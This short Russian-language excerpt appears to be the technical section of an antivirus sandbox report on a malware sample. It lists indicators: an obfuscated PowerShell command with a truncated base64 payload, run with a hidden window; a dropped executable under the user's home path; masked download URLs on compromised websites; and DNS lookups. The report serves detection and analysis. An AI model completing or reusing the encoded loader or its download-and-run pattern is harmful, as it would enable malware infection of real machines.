Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD UwBlAHQALQBWAGEAUgBpAGEAQgBsAGUAIAAgACgAIgB5AHMAUQBXACIAKwAiADUAIgApACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA0AH0AewAwAH0AewAzAH0AIgAtAGYAIAAnAEkATwAuACcALAAnAHkAcw...
- %HOMEPATH%\sro8843\tqwmx93\ozrn6h2c.exe
- %HOMEPATH%\sro8843\tqwmx93\ozrn6h2c.exe
- 'li#####.strophicmusic.com':443
- http://vi####rganics.com/css/L0vMERYKQD/
- http://ad####yeezy.store/welph/ccrcbr1xFU/
- http://www.zu###.com.tw/wp-admin/lQ59Q/
- DNS ASK at######.##neficiosparaempleados.com
- DNS ASK vi####rganics.com
- DNS ASK ad####yeezy.store
- DNS ASK zu###.com.tw
- DNS ASK vs###mple.com
- DNS ASK tu###lick.co.uk
- DNS ASK li#####.strophicmusic.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD UwBlAHQALQBWAGEAUgBpAGEAQgBsAGUAIAAgACgAIgB5AHMAUQBXACIAKwAiADUAIgApACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA0AH0AewAwAH0AewAzAH0AIgAtAGYAIAAnAEkATwAuACcALAAnAHkAcw...' (со скрытым окном)